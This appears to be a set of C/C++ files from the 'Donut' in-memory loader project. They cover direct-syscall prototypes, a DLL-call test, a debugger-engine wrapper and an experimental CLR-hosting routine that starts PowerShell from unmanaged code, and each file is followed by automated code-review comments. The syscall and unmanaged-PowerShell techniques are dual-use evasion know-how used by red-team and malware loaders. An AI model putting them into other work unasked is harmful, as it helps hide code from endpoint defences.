161 } MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS;
162
163 typedef struct _PS_ATTRIBUTE
164 {
165 ULONG Attribute;
166 SIZE_T Size;
167 union
168 {
169 ULONG Value;
170 PVOID ValuePtr;
171 } u1;
172 PSIZE_T ReturnLength;
173 } PS_ATTRIBUTE, *PPS_ATTRIBUTE;
174
175 typedef struct _PS_ATTRIBUTE_LIST
176 {
177 SIZE_T TotalLength;
178 PS_ATTRIBUTE Attributes[1];
179 } PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;
180
181 EXTERN_C NTSTATUS NtCreateSection(
182 OUT PHANDLE SectionHandle,
183 IN ACCESS_MASK DesiredAccess,
184 IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
185 IN PLARGE_INTEGER MaximumSize OPTIONAL,
186 IN ULONG SectionPageProtection,
187 IN ULONG AllocationAttributes,
188 IN HANDLE FileHandle OPTIONAL,
189 IN PSYSCALL_LIST SyscallList);
190
191 EXTERN_C NTSTATUS NtMapViewOfSection(
192 IN HANDLE SectionHandle,
193 IN HANDLE ProcessHandle,
194 IN OUT PVOID BaseAddress,
195 IN ULONG ZeroBits,
196 IN SIZE_T CommitSize,
197 IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
198 IN OUT PSIZE_T ViewSize,
199 IN ULONG InheritDisposition,
200 IN ULONG AllocationType,
201 IN ULONG Win32Protect,
202 IN PSYSCALL_LIST SyscallList);
203
204 EXTERN_C NTSTATUS NtUnmapViewOfSection(
205 IN HANDLE ProcessHandle,
206 IN PVOID BaseAddress,
207 IN PSYSCALL_LIST SyscallList);
208
209 EXTERN_C NTSTATUS NtContinue(
210 IN PCONTEXT ContextRecord,
211 IN BOOLEAN TestAlert,
212 IN PSYSCALL_LIST SyscallList);
213
214 EXTERN_C NTSTATUS NtClose(
215 IN HANDLE Handle,
216 IN PSYSCALL_LIST SyscallList);
217
218 EXTERN_C NTSTATUS NtWaitForSingleObject(
219 IN HANDLE ObjectHandle,
220 IN BOOLEAN Alertable,
221 IN PLARGE_INTEGER TimeOut OPTIONAL,
222 IN PSYSCALL_LIST SyscallList);
223
224 EXTERN_C NTSTATUS NtProtectVirtualMemory(
225 IN HANDLE ProcessHandle,
226 IN OUT PVOID * BaseAddress,
227 IN OUT PSIZE_T RegionSize,
228 IN ULONG NewProtect,
229 OUT PULONG OldProtect,
230 IN PSYSCALL_LIST SyscallList);
231
232 EXTERN_C NTSTATUS NtAllocateVirtualMemory(
233 IN HANDLE ProcessHandle,
234 IN OUT PVOID * BaseAddress,
235 IN ULONG ZeroBits,
236 IN OUT PSIZE_T RegionSize,
237 IN ULONG AllocationType,
238 IN ULONG Protect,
239 IN PSYSCALL_LIST SyscallList);
240
241 EXTERN_C NTSTATUS NtCreateFile(
242 OUT PHANDLE FileHandle,
243 IN ACCESS_MASK DesiredAccess,
244 IN POBJECT_ATTRIBUTES ObjectAttributes,
245 OUT PIO_STATUS_BLOCK IoStatusBlock,
246 IN PLARGE_INTEGER AllocationSize OPTIONAL,
247 IN ULONG FileAttributes,
248 IN ULONG ShareAccess,
249 IN ULONG CreateDisposition,
250 IN ULONG CreateOptions,
251 IN PVOID EaBuffer OPTIONAL,
252 IN ULONG EaLength,
253 IN PSYSCALL_LIST SyscallList);
254
255 EXTERN_C NTSTATUS NtGetContextThread(
256 IN HANDLE ThreadHandle,
257 IN OUT PCONTEXT ThreadContext,
258 IN PSYSCALL_LIST SyscallList);
259
260 EXTERN_C NTSTATUS NtFreeVirtualMemory(
261 IN HANDLE ProcessHandle,
262 IN OUT PVOID * BaseAddress,
263 IN OUT PSIZE_T RegionSize,
264 IN ULONG FreeType,
265 IN PSYSCALL_LIST SyscallList);
266
267 EXTERN_C NTSTATUS NtQueryVirtualMemory(
268 IN HANDLE ProcessHandle,
269 IN PVOID BaseAddress,
270 IN MEMORY_INFORMATION_CLASS MemoryInformationClass,
271 OUT PVOID MemoryInformation,
272 IN SIZE_T MemoryInformationLength,
273 OUT PSIZE_T ReturnLength OPTIONAL,
274 IN PSYSCALL_LIST SyscallList);
275
276 EXTERN_C NTSTATUS NtCreateThreadEx(
277 OUT PHANDLE ThreadHandle,
278 IN ACCESS_MASK DesiredAccess,
279 IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
280 IN HANDLE ProcessHandle,
281 IN PVOID StartRoutine,
282 IN PVOID Argument OPTIONAL,
283 IN ULONG CreateFlags,
284 IN SIZE_T ZeroBits,
285 IN SIZE_T StackSize,
286 IN SIZE_T MaximumStackSize,
287 IN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL,
288 IN PSYSCALL_LIST SyscallList);
289
290 EXTERN_C NTSTATUS NtFlushInstructionCache(
291 IN HANDLE ProcessHandle,
292 IN PVOID BaseAddress OPTIONAL,
293 IN ULONG Length,
294 IN PSYSCALL_LIST SyscallList);
295
296 #endif
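Review bot: `SW2_ROL8` and `SW2_ROR8` use their argument unparenthesised, so an argument such as `a ^ b` would be regrouped by operator precedence instead of being rotated as a whole. `#define SW2_ROL8(v) ((v) << 8 | (v) >> 24)` and the matching `#define SW2_ROR8(v) ((v) >> 8 | (v) << 24)` avoid that. The comment "Typedefs are prefixed to avoid pollution" does not hold for `OBJECT_ATTRIBUTES` and `IO_STATUS_BLOCK`, which are declared under their SDK names and would presumably clash if a consumer also includes `winternl.h`. A one-line comment above the `EXTERN_C` prototypes, saying that each takes an extra trailing `PSYSCALL_LIST` compared with the ntdll export of the same name, would keep readers from mistaking them for the documented signatures.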
0
1 #define UNICODE
2 #include <windows.h>
3
4 #include "donut.h"
5 #pragma comment(lib, "user32.lib")
6
7 void call_api(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
8 typedef VOID (WINAPI *_DonutApiW)(PWCHAR,PWCHAR,PWCHAR,PWCHAR);
9
10 int main(void) {
11 HMODULE m;
12 _DonutApiW DonutApiW;
13 WCHAR param[4][DONUT_MAX_NAME]={L"arg0",L"arg1",L"arg2",L"arg3"};
14
15 WCHAR msg[4096];
16
17 _snwprintf(msg, ARRAYSIZE(msg),
18 L"param[0] : %ws\r"
19 L"param[1] : %ws\r"
20 L"param[2] : %ws\r"
21 L"param[3] : %ws\r",
22 param[0], param[1], param[2], param[3]);
23
24 MessageBox(NULL, msg, L"Donut Test", MB_OK);
25
26 m = LoadLibrary(L"call_api_dll.dll");
27
28 if(m != NULL) {
29 DonutApiW = (_DonutApiW)GetProcAddress(m, "DonutApiW");
30 if(DonutApiW != NULL) {
31 call_api((FARPROC)DonutApiW, 4, param);
32 }
33 }
34 return 0;
35 }
36
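Review bot: `LoadLibrary(L"call_api_dll.dll")` in `main` passes a bare file name, so the loader resolves it through the default DLL search order and may pick up a same-named DLL from another directory on that path. Restricting the search keeps the test bound to the DLL shipped next to it: `m = LoadLibraryEx(L"call_api_dll.dll", NULL, LOAD_LIBRARY_SEARCH_APPLICATION_DIR);`. Both failure paths (`m == NULL`, `DonutApiW == NULL`) also return 0 silently, so a missing DLL looks like a passing run. Printing `GetLastError()` and returning non-zero there would make the failure visible.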
0
1 // example of using the windows debugger engine from console
2 // derived from code by the blabberer
3
4 #include "debug.h"
5
6 // ##################### Debug class ########################
7 Debug::Debug() {
8 Client = NULL;
9 Control = NULL;
10 Breakpoint = NULL;
11
12 // create instance of IDebugClient
13 Status = DebugCreate(__uuidof(IDebugClient), (void**)&Client);
14 if(Status == S_OK) {
15 // obtain IDebugControl interface
16 Status = Client->QueryInterface(__uuidof(IDebugControl), (void**)&Control);
17 if(Status == S_OK) {
18 // setup callbacks for console I/O
19 Client->SetOutputCallbacks(&OutputCb);
20 Client->SetInputCallbacks(&InputCb);
21 InputCb.Control = Control;
22
23 Client->SetEventCallbacks(&EventCb);
24 EventCb.Control = Control;
25 }
26 }
27 }
28
29 // create new process or attach to existing one
30 // CommandLine should be set to NULL if attaching
31 Debug::Debug(PSTR CommandLine, ULONG ProcessId) {
32 Debug();
33 Start(CommandLine, ProcessId);
34 }
35
36 Debug::~Debug() {
37 if (Control != NULL) {
38 Control->Release();
39 Control = NULL;
40 }
41 if (Client != NULL) {
42 Client->EndSession(DEBUG_END_PASSIVE);
43 Client->Release();
44 Client = NULL;
45 }
46 }
47
48 BOOL Debug::Start(PSTR CommandLine, ULONG ProcessId) {
49 ULONG AttachFlags = DEBUG_ATTACH_NONINVASIVE | DEBUG_ATTACH_NONINVASIVE_NO_SUSPEND;
50 ULONG CreateFlags = DEBUG_ONLY_THIS_PROCESS;
51
52 Status = Client->CreateProcessAndAttach(0, CommandLine, CreateFlags, ProcessId, AttachFlags);
53 return Status == S_OK;
54 }
55
56 // ##################### IDebugOutputCallbacks ########################
57 // https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/dbgeng/nn-dbgeng-idebugoutputcallbacks
58 STDMETHODIMP StdioOutputCallbacks::QueryInterface(THIS_ IN REFIID InterfaceId, OUT PVOID* Interface) {
59 *Interface = NULL;
60
61 if (IsEqualIID(InterfaceId, __uuidof(IUnknown)) ||
62 IsEqualIID(InterfaceId, __uuidof(IDebugOutputCallbacks))) {
63 *Interface = (IDebugOutputCallbacks *)this;
64 AddRef();
65 return S_OK;
66 } else {
67 return E_NOINTERFACE;
68 }
69 }
70
71 // ##################### IDebugInputCallbacks ########################
72 // https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/dbgeng/nn-dbgeng-idebuginputcallbacks
73 STDMETHODIMP StdioInputCallbacks::QueryInterface( THIS_ IN REFIID InterfaceId, OUT PVOID* Interface) {
74 *Interface = NULL;
75
76 if (IsEqualIID(InterfaceId, __uuidof(IUnknown)) ||
77 IsEqualIID(InterfaceId, __uuidof(IDebugInputCallbacks))) {
78 *Interface = (IDebugInputCallbacks *)this;
79 AddRef();
80 return S_OK;
81 } else {
82 return E_NOINTERFACE;
83 }
84 }
85
86 STDMETHODIMP StdioInputCallbacks::StartInput(THIS_ IN ULONG BufferSize) {
87 char *Buffer;
88
89 Buffer = (char *)calloc(1, BufferSize+8);
90 fgets(Buffer, BufferSize, stdin);
91 Control->ReturnInput(Buffer);
92 free(Buffer);
93
94 return S_OK;
95 }
96
97 // ##################### DebugBaseEventCallbacks ########################
98 STDMETHODIMP EventCallbacks::Breakpoint( THIS_ IN PDEBUG_BREAKPOINT Bp ) {
99 return DEBUG_STATUS_BREAK;
100 }
101
102 STDMETHODIMP EventCallbacks::CreateProcess(THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 Handle,
103 IN ULONG64 BaseOffset,IN ULONG ModuleSize,IN PCSTR ModuleName,IN PCSTR ImageName,
104 IN ULONG CheckSum, IN ULONG TimeDateStamp,IN ULONG64 InitialThreadHandle,
105 IN ULONG64 ThreadDataOffset, IN ULONG64 StartOffset
106 )
107 {
108 HRESULT Status;
109 IDebugBreakpoint* Breakpoint;
110
111 Status = Control->AddBreakpoint(DEBUG_BREAKPOINT_CODE, DEBUG_ANY_ID, &Breakpoint);
112 if(Status == S_OK) {
113 Status = Breakpoint->SetOffset(StartOffset);
114 if(Status == S_OK) {
115 Status = Breakpoint->SetFlags(DEBUG_BREAKPOINT_ENABLED);
116 }
117 }
118 return DEBUG_STATUS_NO_CHANGE;
119 }
120
121 STDMETHODIMP EventCallbacks::CreateThread(THIS_ IN ULONG64 Handle, IN ULONG64 DataOffset, IN ULONG64 StartOffset) {
122 return DEBUG_STATUS_NO_CHANGE;
123 }
124
125 STDMETHODIMP EventCallbacks::Exception( THIS_ IN PEXCEPTION_RECORD64 Exception, IN ULONG FirstChance ) {
126 return DEBUG_STATUS_BREAK;
127 }
128
129 STDMETHODIMP EventCallbacks::ExitProcess (THIS_ IN ULONG ExitCode ) {
130 return DEBUG_STATUS_NO_CHANGE;
131 }
132
133 STDMETHODIMP EventCallbacks::ExitThread (THIS_ IN ULONG ExitCode ) {
134 return DEBUG_STATUS_NO_CHANGE;
135 }
136
137 STDMETHODIMP EventCallbacks::GetInterestMask( THIS_ OUT PULONG Mask ) {
138 *Mask =
139 DEBUG_EVENT_BREAKPOINT |
140 DEBUG_EVENT_EXCEPTION |
141 DEBUG_EVENT_CREATE_THREAD |
142 DEBUG_EVENT_EXIT_THREAD |
143 DEBUG_EVENT_CREATE_PROCESS |
144 DEBUG_EVENT_EXIT_PROCESS |
145 DEBUG_EVENT_LOAD_MODULE |
146 DEBUG_EVENT_UNLOAD_MODULE |
147 DEBUG_EVENT_SYSTEM_ERROR |
148 DEBUG_EVENT_SESSION_STATUS |
149 DEBUG_EVENT_CHANGE_DEBUGGEE_STATE |
150 DEBUG_EVENT_CHANGE_ENGINE_STATE |
151 DEBUG_EVENT_CHANGE_SYMBOL_STATE;
152 return S_OK;
153 }
154
155 STDMETHODIMP EventCallbacks::LoadModule( THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 BaseOffset,
156 IN ULONG ModuleSize,IN PCSTR ModuleName, IN PCSTR ImageName, IN ULONG CheckSum, IN ULONG TimeDateStamp ) {
157 return DEBUG_STATUS_NO_CHANGE;
158 }
159
160 STDMETHODIMP EventCallbacks::SystemError( THIS_ IN ULONG Error, IN ULONG Level ) {
161 return DEBUG_STATUS_BREAK;
162 }
163
164 STDMETHODIMP EventCallbacks::UnloadModule( THIS_ IN PCSTR ImageBaseName, IN ULONG64 BaseOffset ) {
165 return DEBUG_STATUS_NO_CHANGE;
166 }
167
168 STDMETHODIMP EventCallbacks::SessionStatus( THIS_ IN ULONG SessionStatus ) {
169 return DEBUG_STATUS_NO_CHANGE;
170 }
171
172 STDMETHODIMP EventCallbacks::ChangeDebuggeeState( THIS_ IN ULONG Flags, IN ULONG64 Argument ) {
173 //State = 1;
174 return DEBUG_STATUS_NO_CHANGE;
175 }
176
177 STDMETHODIMP EventCallbacks::ChangeEngineState( THIS_ IN ULONG Flags, IN ULONG64 Argument ) {
178 return DEBUG_STATUS_NO_CHANGE;
179 }
180
181 STDMETHODIMP EventCallbacks::ChangeSymbolState( THIS_ IN ULONG Flags, IN ULONG64 Argument ) {
182 return DEBUG_STATUS_NO_CHANGE;
183 }
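Review bot: In `Debug::Debug(PSTR CommandLine, ULONG ProcessId)` the statement `Debug();` constructs and destroys a temporary instead of initialising `this`. `Client`, `Control` and `Breakpoint` are therefore still uninitialised when `Start` calls `Client->CreateProcessAndAttach`. A delegating constructor fixes that: `Debug::Debug(PSTR CommandLine, ULONG ProcessId) : Debug() { Start(CommandLine, ProcessId); }`. `Start` should also guard against a failed `DebugCreate` with `if (Client == NULL) return FALSE;`. Separately, `StartInput` passes the `calloc` result to `fgets` and `ReturnInput` without a NULL check.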
0
1 #ifndef DEBUG_H
2 #define DEBUG_H
3
4 #include <windows.h>
5 #include <dbgeng.h>
6 #include <stdio.h>
7
8 #pragma comment(lib, "dbgeng.lib")
9
10 class EventCallbacks : public DebugBaseEventCallbacks {
11 public:
12 STDMETHOD_(ULONG, AddRef) (THIS ) { return 1;};
13 STDMETHOD_(ULONG, Release) (THIS ) { return 0;};
14 STDMETHOD(Breakpoint) (THIS_ IN PDEBUG_BREAKPOINT Bp );
15 STDMETHOD(ChangeDebuggeeState) (THIS_ IN ULONG Flags, IN ULONG64 Argument );
16 STDMETHOD(ChangeEngineState) (THIS_ IN ULONG Flags, IN ULONG64 Argument );
17 STDMETHOD(ChangeSymbolState) (THIS_ IN ULONG Flags, IN ULONG64 Argument );
18 STDMETHOD(CreateThread) (THIS_ IN ULONG64 Handle, IN ULONG64 DataOffset,IN ULONG64 StartOffset);
19 STDMETHOD(Exception) (THIS_ IN PEXCEPTION_RECORD64 Exception, IN ULONG FirstChance );
20 STDMETHOD(ExitProcess) (THIS_ IN ULONG ExitCode );
21 STDMETHOD(ExitThread) (THIS_ IN ULONG ExitCode );
22 STDMETHOD(GetInterestMask) (THIS_ OUT PULONG Mask );
23 STDMETHOD(SessionStatus) (THIS_ IN ULONG Status );
24 STDMETHOD(SystemError) (THIS_ IN ULONG Error, IN ULONG Level );
25 STDMETHOD(UnloadModule) (THIS_ IN PCSTR ImageBaseName, IN ULONG64 BaseOffset );
26 STDMETHOD(LoadModule) (THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 BaseOffset, IN ULONG ModuleSize, IN PCSTR ModuleName,IN PCSTR ImageName, IN ULONG CheckSum, IN ULONG TimeDateStamp );
27 STDMETHOD(CreateProcess) ( THIS_ IN ULONG64 ImageFileHandle, IN ULONG64 Handle, IN ULONG64 BaseOffset, IN ULONG ModuleSize, IN PCSTR ModuleName, IN PCSTR ImageName, IN ULONG CheckSum, IN ULONG TimeDateStamp, IN ULONG64 InitialThreadHandle, IN ULONG64 ThreadDataOffset, IN ULONG64 StartOffset );
28
29 IDebugClient* Client;
30 IDebugControl* Control;
31 };
32
33 class StdioOutputCallbacks : public IDebugOutputCallbacks {
34 public:
35 STDMETHOD(QueryInterface)(THIS_ IN REFIID InterfaceId, OUT PVOID* Interface);
36 STDMETHOD_(ULONG, AddRef)(THIS){ return 1; };
37 STDMETHOD_(ULONG, Release)(THIS){ return 0; };
38 STDMETHOD(Output)(THIS_ IN ULONG Mask, IN PCSTR Text) { fputs(Text, stdout); return S_OK; };
39 };
40
41 class StdioInputCallbacks : public IDebugInputCallbacks {
42 public:
43 STDMETHOD(QueryInterface)(THIS_ IN REFIID InterfaceId, OUT PVOID* Interface);
44 STDMETHOD_(ULONG, AddRef)(THIS){ return 1; };
45 STDMETHOD_(ULONG, Release)(THIS) { return 0; };
46 STDMETHOD(StartInput)(THIS_ IN ULONG BufferSize);
47 STDMETHOD(EndInput)(THIS_ void) { return S_OK; };
48
49 IDebugControl* Control;
50 };
51
52 class Debug {
53 public:
54 Debug();
55 Debug(PSTR CommandLine, ULONG ProcessId);
56 ~Debug();
57 BOOL Debug::Start(PSTR CommandLine, ULONG ProcessId);
58
59 StdioOutputCallbacks OutputCb;
60 StdioInputCallbacks InputCb;
61 EventCallbacks EventCb;
62
63 IDebugClient* Client;
64 IDebugControl* Control;
65 IDebugBreakpoint* Breakpoint;
66 bool State;
67 HRESULT Status;
68 };
69
70 #endif
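Review bot: The in-class declaration `BOOL Debug::Start(PSTR CommandLine, ULONG ProcessId);` carries an extra `Debug::` qualification, which MSVC tolerates but GCC and Clang reject; inside the class it should read `BOOL Start(PSTR CommandLine, ULONG ProcessId);`. The callback classes return constants from `AddRef`/`Release` (1 and 0), which is only safe because they are held as members of `Debug`. A short comment such as `// not reference counted: lifetime is owned by Debug` would stop someone from heap-allocating them later. `bool State` is declared but never given a value by the constructors in the accompanying source file.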
0
1 // code to implement hooking ProcessExit from unmanaged code
2 // https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.marshal?view=netframework-4.8
3 //
4 #include <windows.h>
5 #include <oleauto.h>
6 #include <mscoree.h>
7 #include <comdef.h>
8 #include <propvarutil.h>
9 #include <metahost.h>
10
11 #include <cstdio>
12 #include <cstdint>
13 #include <cstring>
14 #include <cstdlib>
15 #include <sys/stat.h>
16
17 #import "mscorlib.tlb" raw_interfaces_only
18 #import "shdocvw.dll"
19
20 #pragma comment(lib, "mscoree.lib")
21
22 void my_function(void *evt) {
23 printf("Received event\n");
24 }
25
26 void DumpMethods(mscorlib::_TypePtr type) {
27 mscorlib::_MethodInfoPtr mi;
28 mscorlib::_ParameterInfoPtr pi;
29 mscorlib::_TypePtr ptype;
30 SAFEARRAY *sa, *params;
31 HRESULT hr;
32 LONG i, j, cnt, pcnt, lcnt, ucnt;
33 BSTR name;
34 VARIANT vt;
35 VARTYPE var;
36
37 hr = type->GetMethods(
38 (mscorlib::BindingFlags)
39 (mscorlib::BindingFlags_Static |
40 mscorlib::BindingFlags_Public),
41 &sa);
42
43 if(hr == S_OK) {
44 SafeArrayGetLBound(sa, 1, &lcnt);
45 SafeArrayGetUBound(sa, 1, &ucnt);
46
47 cnt = (ucnt - lcnt + 1);
48
49 for(i=0; i<cnt; i++) {
50 hr = SafeArrayGetElement(sa, &i, (void*)&mi);
51 if(hr == S_OK) {
52 mi->get_name(&name);
53 printf("%ws(", name);
54 hr = mi->GetParameters(&params);
55 if(hr == S_OK) {
56 SafeArrayGetLBound(params, 1, &lcnt);
57 SafeArrayGetUBound(params, 1, &ucnt);
58
59 pcnt = (ucnt - lcnt + 1);
60 printf("%i", pcnt);
61 for(j=0; j<pcnt; j++) {
62 hr = SafeArrayGetElement(params, &j, (void*)&pi);
63
64 // VARTYPE should be VT_UNKNOWN
65 hr = SafeArrayGetVartype(params, &var);
66 BSTR meth = SysAllocString(L"ParameterType");
67 DISPID id;
68 // hr = pi->GetIDsOfNames(IID_NULL, meth, 1, GetUserDefaultLCID(), &id);
69 //DISPATCH_METHOD, LOCALE_USER_DEFAULT, &id);
70 printf("HRESULT : %lx\n", hr);
71 }
72 }
73 printf(")\n");
74 }
75 }
76 }
77 }
78
79 void rundotnet(void *code, size_t len) {
80 HRESULT hr;
81 ICLRMetaHost *icmh;
82 ICLRRuntimeInfo *icri;
83 ICorRuntimeHost *icrh;
84 IUnknownPtr iu;
85 mscorlib::_AppDomainPtr ad;
86 mscorlib::_AssemblyPtr as, as1, as2, as3;
87 mscorlib::_MethodInfoPtr mi;
88 mscorlib::_EventInfoPtr nfo;
89 mscorlib::_TypePtr evt, ptr, type, mars, del, _void, powershell;
90 mscorlib::_DelegatePtr delegate;
91 mscorlib::_ParameterInfoPtr param;
92 mscorlib::_EventHandlerPtr handler;
93 VARIANT v1, v2, v_ptr, v_type, ret;
94 SAFEARRAY *sa, *sa2, *sav;
95 SAFEARRAYBOUND sab;
96 BOOL loadable;
97 LONG idx;
98
99 printf("CoCreateInstance(ICorRuntimeHost).\n");
100
101 hr = CLRCreateInstance(
102 CLSID_CLRMetaHost,
103 IID_ICLRMetaHost,
104 (LPVOID*)&icmh);
105
106 if(SUCCEEDED(hr)) {
107 printf("ICLRMetaHost::GetRuntime\n");
108
109 hr = icmh->GetRuntime(
110 L"v4.0.30319",
111 IID_ICLRRuntimeInfo, (LPVOID*)&icri);
112
113 if(SUCCEEDED(hr)) {
114 printf("ICLRRuntimeInfo::IsLoadable\n");
115 hr = icri->IsLoadable(&loadable);
116
117 if(SUCCEEDED(hr) && loadable) {
118 printf("ICLRRuntimeInfo::GetInterface\n");
119
120 hr = icri->GetInterface(
121 CLSID_CorRuntimeHost,
122 IID_ICorRuntimeHost,
123 (LPVOID*)&icrh);
124 } else return;
125 } else return;
126 } else return;
127
128 printf("ICorRuntimeHost::Start()\n");
129 hr = icrh->Start();
130 if(SUCCEEDED(hr)) {
131 printf("ICorRuntimeHost::GetDefaultDomain()\n");
132 hr = icrh->GetDefaultDomain(&iu);
133 if(SUCCEEDED(hr)) {
134 printf("IUnknown::QueryInterface()\n");
135 hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
136 if(SUCCEEDED(hr)) {
137 BSTR strX = SysAllocString(L"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
138 // ([system.reflection.assembly]::loadfile("C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")).FullName
139 BSTR str1 = SysAllocString(L"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");
140
141 BSTR str2 = SysAllocString(L"mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
142
143 hr = ad->Load_2(str1, &as1); // load automation
144 hr = ad->Load_2(strX, &as3); // load interop services
145 printf("Loading System.Management.Automation : %lx\n", hr);
146 hr = ad->Load_2(str2, &as2); // load mscorlib
147
148 BSTR alloc = SysAllocString(L"Create");
149 BSTR marshal = SysAllocString(L"System.Management.Automation.PowerShell");
150 hr = as1->GetType_2(marshal, &mars);
151
152 printf("GetType_2(PowerShell) : %lx %p\n", hr, (PVOID)mars);
153
154 DumpMethods(mars);
155
156 // to retrieve a method, the SAFEARRAY is of IUnknown types
157 // this method doesn't accept anything, so just allocate array for it
158 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 0);
159
160 hr = mars->GetMethod(alloc,
161 (mscorlib::BindingFlags)
162 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
163 NULL, // Binder
164 sav, // SAFEARRAY(_Type*)
165 NULL, // Modifiers
166 &mi); // MethodInfo
167
168 printf("System.Management.Automation.PowerShell.GetMethod(Create) : %lx : %p\n", hr, (PVOID)mi);
169
170 v1.vt = VT_EMPTY;
171 VariantClear(&ret);
172
173 hr = mi->Invoke_3(
174 v1,
175 NULL, // arguments to method
176 &ret); // return value from method
177
178 printf("%lx %p %i %i\n", hr, (LPVOID)ret.punkVal, V_VT(&ret), GetLastError());
179
180 // at this point, we have the powershell object. we just need to call AddScript
181 // method, but this is an IDisposable
182
183 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 1);
184 BSTR object = SysAllocString(L"System.Object");
185
186 as2->GetType_2(object, &ptr);
187 idx = 0;
188 SafeArrayPutElement(sav, &idx, ptr);
189
190 BSTR get_obj = SysAllocString(L"GetIUnknownForObject");
191 BSTR mars_str = SysAllocString(L"System.Runtime.InteropServices.Marshal");
192 hr = as3->GetType_2(mars_str, &mars);
193
194 printf("Marshal : %p\n", (PVOID)mars);
195
196 hr = mars->GetMethod(get_obj,
197 (mscorlib::BindingFlags)
198 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
199 NULL, // Binder
200 sav, // SAFEARRAY(_Type*)
201 NULL, // Modifiers
202 &mi); // MethodInfo
203
204 printf("GetMethod() : %lx %p\n", hr, (PVOID)mi);
205
206 sav = SafeArrayCreateVector(VT_VARIANT, 0, 1);
207 idx = 0;
208 SafeArrayPutElement(sav, &idx, &ret.punkVal);
209
210 v1.vt = VT_EMPTY;
211 VARIANT unk;
212 VariantClear(&unk);
213
214 hr = mi->Invoke_3(
215 v1,
216 sav, // arguments to method
217 &unk); // return value from method
218
219 printf("%lx %p\n", hr, (LPVOID)V_BYREF(&unk));
220 getchar();
221 return;
222
223 // SAFEARRAY(_Type*)
224 sav = SafeArrayCreateVector(VT_UNKNOWN, 0, 2);
225
226 // add System.IntPtr
227 BSTR str4 = SysAllocString(L"System.IntPtr");
228 as2->GetType_2(str4, &ptr);
229 //DumpMethods(ptr);
230 idx = 0;
231 hr = SafeArrayPutElement(sav, &idx, ptr);
232
233 // add System.Type
234 BSTR str5 = SysAllocString(L"System.Type");
235 as2->GetType_2(str5, &type);
236 idx = 1;
237 SafeArrayPutElement(sav, &idx, type);
238
239 BSTR str6 = SysAllocString(L"GetIUnknownForObject");
240 BSTR str3 = SysAllocString(L"System.Runtime.InteropServices.Marshal");
241 hr = as1->GetType_2(str3, &mars);
242
243 hr = mars->GetMethod(str6,
244 (mscorlib::BindingFlags)
245 (mscorlib::BindingFlags_Static | mscorlib::BindingFlags_Public),
246 NULL, // Binder
247 sav, // SAFEARRAY(_Type*)
248 NULL, // Modifiers
249 &mi); // MethodInfo
250
251 printf("\nGetMethod(GetDelegateForFunctionPointer) HRESULT : %08lx MethodInfoPtr : %p\n", hr, (void*)mi);
252
253 BSTR str9 = SysAllocString(L"ProcessExit");
254 BSTR strA = SysAllocString(L"System.AppDomain");
255
256 hr = as2->GetType_2(strA, &evt);
257 printf("GetType_2(System.AppDomain) HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
258
259 hr = evt->GetEvent(str9,
260 (mscorlib::BindingFlags)
261 (mscorlib::BindingFlags_Instance | mscorlib::BindingFlags_Public),
262 &nfo);
263
264 printf("GetEvent(ProcessExit) HRESULT : %08lx EventInfoPtr : %p\n", hr, (void*)nfo);
265
266 hr = nfo->get_EventHandlerType(&evt);
267 printf("EventHandlerType(ProcessExit) : HRESULT : %08lx TypePtr : %p\n", hr, (void*)evt);
268
269 BSTR type_name, base_name;
270 mscorlib::_TypePtr base_type, ref_type;
271
272 evt->get_name(&type_name);
273 evt->get_BaseType(&base_type);
274 base_type->get_name(&base_name);
275
276 wprintf(L"Event Type : %s\nBase Type : %s\n", type_name, base_name);
277
278 printf("my_function = %p\n", (void*)my_function);
279
280 // SAFEARRAY(VARIANT)
281 sav = SafeArrayCreateVector(VT_VARIANT, 0, 2);
282
283 VariantClear(&v_ptr);
284 V_BYREF(&v_ptr) = (PVOID)my_function;
285 V_VT(&v_ptr) = VT_INT;
286
287 idx = 0;
288 SafeArrayPutElement(sav, &idx, &v_ptr);
289
290 BSTR strZ = SysAllocString(L"System.MultiDelegate");
291 hr = as2->GetType_2(strZ, &type);
292 printf("System.Delegate = %lx, %p\n", hr, (void*)type);
293
294 idx = 1;
295 V_VT(&v_type) = VT_UNKNOWN;
296 V_UNKNOWN(&v_type) = type;
297 SafeArrayPutElement(sav, &idx, &type);
298
299 v1.vt = VT_EMPTY;
300 VariantClear(&ret);
301
302 printf("Calling GetDelegateForFunctionPointer\n");
303 hr = mi->Invoke_3(
304 v1,
305 sav, // arguments to method
306 &ret); // return value from method
307
308 printf("Invoke_3(GetDelegateForFunctionPointer) HRESULT : %08lx : %x : %p\n", hr, V_VT(&ret), V_BYREF(&ret));
309
310 /**if(hr != S_OK) {
311 printf("Failed to obtain delegate\n");
312 return;
313 }*/
314
315 printf("Delegate : %p\n", ret.punkVal);
316
317 hr = ret.punkVal->QueryInterface(IID_IUnknown, (void**)&handler);
318 printf("HRESULT : %08lx : %p\n", hr, (void*)handler);
319
320 hr = ad->add_ProcessExit(handler);
321 printf("HRESULT : %08lx\n", hr);
322
323 sab.lLbound = 0;
324 sab.cElements = len;
325 printf("SafeArrayCreate()\n");
326 sa = SafeArrayCreate(VT_UI1, 1, &sab);
327
328 if(sa != NULL) {
